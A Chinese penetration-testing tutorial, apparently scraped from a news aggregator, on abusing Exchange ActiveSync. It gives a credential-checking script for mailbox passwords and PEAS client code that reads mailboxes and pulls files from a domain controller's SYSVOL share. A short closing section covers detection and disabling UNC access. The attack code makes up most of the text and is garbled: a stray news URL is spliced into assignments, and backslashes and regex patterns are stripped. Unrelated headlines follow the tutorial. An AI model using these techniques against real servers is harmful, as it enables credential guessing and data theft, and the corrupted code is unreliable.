渗透|渗透技巧——通过Exchange ActiveSync访问内部文件共享 |技巧|内部|

https://labs.f-secure.com/archive/accessing-internal-fileshares-through-exchange-activesync/
本文将要基于他们的研究，介绍通过Exchange ActiveSync访问内部文件共享的细节，记录研究心得。
0x01 简介
本文将要介绍以下内容：
·通过Exchange ActiveSync验证用户邮箱口令
·Exchange ActiveSync开源代码测试
·通过Exchange ActiveSync访问内部文件共享的细节
·防御检测
0x02 基础知识
Exchange ActiveSync是一种Microsoft Exchange同步协议，该协议经过优化，以适用于高延迟和低宽带网络。
该协议基于HTTP和XML ，使移动设备可以访问其电子邮件、日历、联系人和任务，并且在脱机工作时仍可以继续访问这些信息。
简单理解，计算机用户通过owa(Outlook Web Access)访问邮件资源，手机用户通过eas(Exchange ActiveSync)访问邮件资源。
0x03 通过Exchange ActiveSync验证用户邮箱口令
默认对应的URL：/Microsoft-Server-ActiveSync 。
可以直接通过浏览器进行访问，提示输入用户名和口令。
输入正确的用户名和口令后，返回内容如下图：

本文插图

如果没有凭据，可直接通过wget命令获得服务器信息，命令实例：
wget https://192.168.1.1/Microsoft-Server-ActiveSync --no-check-certificate --debug

返回结果如下图：

本文插图

为了能够通过脚本实现口令验证，这里需要使用OPTIONS方法，如果凭据有效，返回状态码200 。
header部分加入HTTP基本认证(Basic Authentication) ，格式为Authorization: Basic &lt string &gt
&lt string &gt为"username:password" 用base64编码后的字符串。
Python实现代码如下：
import requests
import base64
import sys
import warnings
warnings.filterwarnings("ignore")
def test_options_https(ip,username,password):
try:
credential = base64.b64encode(username+":"+password)
url = "https://" + ip + "/Microsoft-Server-ActiveSync"
headers = {
"User-Agent": "Mozilla/5.0 (X11 Linux x86_64 rv:52.0) Gecko/20100101 Firefox/52.0",
"Accept": "text/html,application/xhtml+xml,application/xmlq=0.9,*/*q=0.8",
"Accept-Language": "en-US,enq=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/vnd.ms-sync.wbxml",
"Authorization": "Basic "+credential
}
r = requests.options(url, headers = headers, verify = False)
if r.status_code ==200:
print("[+] Valid: %s %s"%(username,password))
#print(r.headers)
else:
print("[!] Authentication failed")
except Exception as e:
print("[!]Error:%s"%e)
if __name__ == "__main__":

if len(sys.argv)!=4:
print("[!]Wrong parameter")
print("easCheck")
print("Use to check the valid credential of eas(Exchange Server ActiveSync)")
print("Usage:")
print("%s "%(sys.argv[0]))
print("Eg.")
print("%s 192.168.1.1 user1 password1"%(sys.argv[0]))
sys.exit(0)
else:
test_options_https(sys.argv[1], sys.argv[2], sys.argv[3])
0x04 Exchange ActiveSync开源代码测试
1.https://github.com/solbirn/pyActiveSync
需要使用Python2 。
为了能够正常测试，还需要如下设置：
(1)同级目录下新建文件proto_creds.py
内容如下：
as_server="192.168.1.1"
as_user="user1"
as_pass="password1"
(2)取消对SSL证书的验证
修改pyActiveSyncobjectsMSASHTTP.py
添加引用import ssl
将httplib.HTTPSConnection(self.server, self.port) 替换为httplib.HTTPSConnection(self.server, self.port, context=ssl._create_unverified_context())
(3)修改pyActiveSync/dev_playground.py
去掉"Suggested Contacts"相关代码。
分别运行dev_playground.py和misc_tests.py ，对应不同的功能。
2.https://github.com/FSecureLABS/peas
需要使用Python2 。
基于pyActiveSync ，添加了导出邮件和访问共享文件的功能。
常用功能如下：
(1)验证凭据
代码示例：
import peas
# Create an instance of the PEAS client.

client = peas.Peas()
# Disable certificate verification so self-signed certificates don"t cause errors.
client.disable_certificate_verification()
# Set the credentials and server to connect to.
client.set_creds({
"server": "192.168.1.1",
"user": "test1",
"password": "123456789",
})
# Check the credentials are accepted.
print("Auth result:", client.check_auth())
(2)读取邮件
读取收件箱邮件的代码示例：
import peas
import re
# Create an instance of the PEAS client.
client = peas.Peas()
# Disable certificate verification so self-signed certificates don"t cause errors.
client.disable_certificate_verification()
# Set the credentials and server to connect to.
client.set_creds({
"server": "192.168.1.1",
"user": "test1",
"password": "123456789",
})
# Retrieve emails.
emails = client.extract_emails()
for email in emails :
print("")
pattern_data = http://news.hoteastday.com/a/re.compile(r"(.*?)")
data = http://news.hoteastday.com/a/pattern_data.findall(email)
print("To:"+data[0])
pattern_data = http://news.hoteastday.com/a/re.compile(r"(.*?)")
data = http://news.hoteastday.com/a/pattern_data.findall(email)
print("From:"+data[0])
pattern_data = http://news.hoteastday.com/a/re.compile(r"(.*?)")
data = http://news.hoteastday.com/a/pattern_data.findall(email)
print("Subject:"+data[0])
pattern_data = http://news.hoteastday.com/a/re.compile(r"(.*?)")
data = http://news.hoteastday.com/a/pattern_data.findall(email)

print("DateReceived:"+data[0])
pattern_data = http://news.hoteastday.com/a/re.compile(r"(.*?)")
data = http://news.hoteastday.com/a/pattern_data.findall(email)
print("DisplayTo:"+data[0])
pattern_data = http://news.hoteastday.com/a/re.compile(r"(.*?)")
data = http://news.hoteastday.com/a/pattern_data.findall(email)
print("ThreadTopic:"+data[0])
pattern_data = http://news.hoteastday.com/a/re.compile(r"(.*?)")
data = http://news.hoteastday.com/a/pattern_data.findall(email)
print("Importance:"+data[0])
pattern_data = http://news.hoteastday.com/a/re.compile(r"(.*?)")
data = http://news.hoteastday.com/a/pattern_data.findall(email)
print("Read:"+data[0])
pattern_data = http://news.hoteastday.com/a/re.compile(r"(.*?)")
data = http://news.hoteastday.com/a/pattern_data.findall(email)
for name in data :
print("Attachment:"+name)
pattern_data = http://news.hoteastday.com/a/re.compile(r"(.*?)")
data = http://news.hoteastday.com/a/pattern_data.findall(email)
print("ConversationIndex:"+data[0])
index1 = email.find("")
index2 = email.find("")
filename = data[0] + ".html"
print("[+] Save body to %s"%(filename))
with open(filename, "w+") as file_object:
file_object.write(email[index1:index2+7])
这里需要注意返回的邮件内容中，邮件正文部分的格式为html ，我的代码实现了将正文部分提取并保存成html格式，以唯一的ConversationIndex作为文件名。
如果想要获得发件箱的邮件信息，需要修改py_activesync_helper.py ，修改的细节可参考。 https://github.com/solbirn/pyActiveSync/blob/master/pyActiveSync/dev_playground.py#L150
(3)访问文件共享

列出共享文件的代码示例：
import peas
# Create an instance of the PEAS client.
client = peas.Peas()
# Disable certificate verification so self-signed certificates don"t cause errors.
client.disable_certificate_verification()
# Set the credentials and server to connect to.
client.set_creds({
"server": "192.168.1.1",
"user": "test1",
"password": "123456789",
})
# Retrieve a file share directory listing.
listing = client.get_unc_listing(r"\dc1SYSVOL")
for data in listing :
print("")
for key,value in data.items():
print("{key}:{value}".format(key = key, value = http://news.hoteastday.com/a/value))
读取指定共享文件内容的代码示例：
import peas
# Create an instance of the PEAS client.
client = peas.Peas()
# Disable certificate verification so self-signed certificates don"t cause errors.
client.disable_certificate_verification()
# Set the credentials and server to connect to.
client.set_creds({
"server": "192.168.1.1",
"user": "test1",
"password": "123456789",
})
data=http://news.hoteastday.com/a/client.get_unc_file(r"\dc1SYSVOL est.comPolicies{6AC1786C-016F-11D2-945F-00C04fB984F9}GPT.INI")
print(data)
0x05 通过Exchange ActiveSync访问内部文件共享的细节
1.列出共享文件
访问的URL示例：

https://192.168.1.1/Microsoft-Server-ActiveSync?Cmd=Search&ampUser=test1&ampDeviceId=123456&ampDeviceType=Python"
参数说明如下：
·Cmd=Search ，表示命令类型为Search
·User=test1 ，表示用户名为test1
·DeviceId=123456 ，表示设备ID ，会被Exchange ActiveSync记录
·DeviceType=Python ，表示设备类型，会被Exchange ActiveSync记录
方法为POST请求
header内容示例：
"Content-Type": "application/vnd.ms-sync.wbxml",
"User-Agent" : ,
"MS-ASProtocolVersion" : "14.1",
"Accept-Language" : "en_us",
"Authorization: Basic dXNlcjElM0FwYXNzd29yZDE="
body内容示例：
需要将xml格式转换为WAP Binary XML(WBXML) 。
xml格式示例：

本文插图

xml格式参考：
https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-asdoc/f8a23578-0ca4-4b36-aa07-3dcac5b83881
WAP Binary XML(WBXML)算法可参考：
https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-aswbxml/39973eb1-1e40-4eb5-ac74-42781c5a33bc
2.读取指定共享文件内容
访问的URL示例：https://192.168.1.1/Microsoft-Server-ActiveSync?Cmd=ItemOperations&ampUser=test1&ampDeviceId=123456&ampDeviceType=Python"
参数说明如下：
·Cmd=ItemOperations ，表示命令类型为ItemOperations

·User=test1 ，表示用户名为test1
·DeviceId=123456 ，表示设备ID ，会被Exchange ActiveSync记录
·DeviceType=Python ，表示设备类型，会被Exchange ActiveSync记录
方法为POST请求
header内容示例：
"Content-Type": "application/vnd.ms-sync.wbxml",
"User-Agent" : ,
"MS-ASProtocolVersion" : "14.1",
"Accept-Language" : "en_us",
"Authorization: Basic dXNlcjElM0FwYXNzd29yZDE="
body内容示例：
需要将xml格式转换为WAP Binary XML (WBXML) 。
xml格式示例：
xml格式参考：
https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-asdoc/e7a91040-42f1-475c-bac3-d83d7dd9652f
我基于peas的代码，提取出访问共享文件的功能，生成了一个免安装的版本，地址如下：
https://github.com/3gstudent/easBrowseSharefile
代码支持两个功能:
1.列出共享文件
2.读取指定共享文件内容
注：访问域内共享目录SYSVOL时，路径要加上域控制器的计算机名，而不是域名。
正确的写法：
\dc1SYSVOL est.comPolicies{6AC1786C-016F-11D2-945F-00C04fB984F9}GPT.INI
错误的写法：
\test.comSYSVOL est.comPolicies{6AC1786C-016F-11D2-945F-00C04fB984F9}GPT.INI
如果掌握了域控制器的计算机名，可以通过Exchange ActiveSync从外网访问域内共享目录SYSVOL中的文件。

0x06 防御检测
通过Exchange ActiveSync读取邮件和访问共享目录会留下设备信息，设备信息对应的代码位置：
https://github.com/FSecureLABS/peas/blob/master/peas/pyActiveSync/objects/MSASHTTP.py#L25
查看设备信息的两个方法。
1.登录Exchange Admin Center
选择邮箱用户-&gtMobile Devices下的View details，如下图：

本文插图

2.使用Exchange Management Shell
命令如下：
Get-ActiveSyncDevice|fl UserDisplayName,DeviceId,DeviceType,DeviceUserAgent
通过Exchange ActiveSync访问共享文件的日志位置：
%ExchangeInstallPath%LoggingHttpProxyEas
关闭通过Exchange ActiveSync访问共享文件的方法：
使用Exchange Management Shell ，命令如下：
Set-MobileDeviceMailboxPolicy -Identity:Default -UNCAccessEnabled:$false -WSSAccessEnabled:$false
【渗透|渗透技巧——通过Exchange ActiveSync访问内部文件共享】

渗透|渗透技巧——通过Exchange ActiveSync访问内部文件共享

推荐阅读

法式鹅肝为什么那么大？

八号蒸汽机外形似狗能爬楼能负重，新加坡由机器人当防疫员

吊带公主裙|40Pro和iPhone 12系列价格曝光，一款涨价，一款持平，疑似MATE

茅台|“本科毕业后，我去海底捞刷盘子……”

名家|九句名家经典，送你九种智慧

AMD|显卡如何降回原价？挖矿凉凉只是第一步

十一假期以来民航旅客运输量相对平稳，7-8日将迎返程高峰

教头|号称八十万禁军教头的林冲，放现在官职多大？听上去也太威风了点

群众网国家终于出手了！苹果损失 8.79 亿美元，这或许是限制的第一步！

「阿眠的一封情书」丈夫愤怒提离婚，如今的我好后悔，婚后将“隐私”透露给丈夫

阿巡谈历史|关羽？，古代有的将军画像为何铠甲外再斜披战袍？比如岳飞

道教|道教神话传说中的四座仙山，每一座都是神仙的居住之地！

Data Mesh的原则和逻辑架构

养花长不好？捡点松针垫盆底，不黄叶、不烂根，养啥都旺盛！

整点鲜闻|你身边的女性朋友哪些行为让你很反感？谈一次作一次

夜间适合什么运动呢

绿豆凉粉热量

「胡塞」也门南部一政府军基地遇袭12名士兵死亡

#甲子光年#为什么说2020是科技并购好时机？

「东湖樱花」到底是在追什么？，像肖战的这些女粉丝们